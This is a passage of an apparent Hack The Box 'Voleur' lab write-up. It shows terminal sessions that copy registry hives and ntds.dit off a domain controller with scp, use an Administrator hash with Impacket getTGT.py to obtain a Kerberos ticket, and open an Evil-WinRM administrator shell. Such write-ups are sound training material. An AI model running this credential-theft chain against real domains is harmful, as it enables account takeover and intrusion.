svc_backup@DC:/mnt/c/IT/Third-Line Support$ cd Backups/
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls
'Active Directory'   registry
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$

and we got a security and system so lets move them back to our machine

bash
vc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/registry$ ls -la
total 17952
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 ..
-rwxrwxrwx 1 svc_backup svc_backup 32768 Jan 30 2025 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 2025 SYSTEM
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/registry$

NTDS.DAT dump

using scp

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ scp -P 2222 -i id_rsa svc_backup@10.129.232.130:'/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM' .
SYSTEM 100% 18MB 363.7KB/s 00:49
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ scp -P 2222 -i id_rsa svc_backup@10.129.232.130:'/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY' .
SECURITY

and we got the ntds file also

plaintext
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ ls
ntds.dit  ntds.jfm
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$

so also download it

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ scp -P 2222 -i id_rsa svc_backup@10.129.232.130:'/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit' .
ntds.dit

then dump the domain hashes

Shell as Administrator

and we got a ticket for the administrator

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ getTGT.py voleur.htb/Administrator:@10.129.232.130 -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Administrator.ccache
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ export KRB5CCNAME=Administrator.ccache
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@VOLEUR.HTB

Valid starting Expires Service principal
06/22/26 02:05:33  06/22/26 12:05:33  krbtgt/VOLEUR.HTB@VOLEUR.HTB
        renew until 06/23/26 02:05:32
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/vole

and we got administrator

bash
┌─[]─[10.10.16.102]─[jimmex@attacker]─[~/htb/labs/voleur]
└──╼ [★]$ KRB5CCNAME=./Administrator.ccache evil-winrm -i dc.voleur.htb -r voleur.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
3ac8c188d5aeb4663c851a5681b265aa
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Resources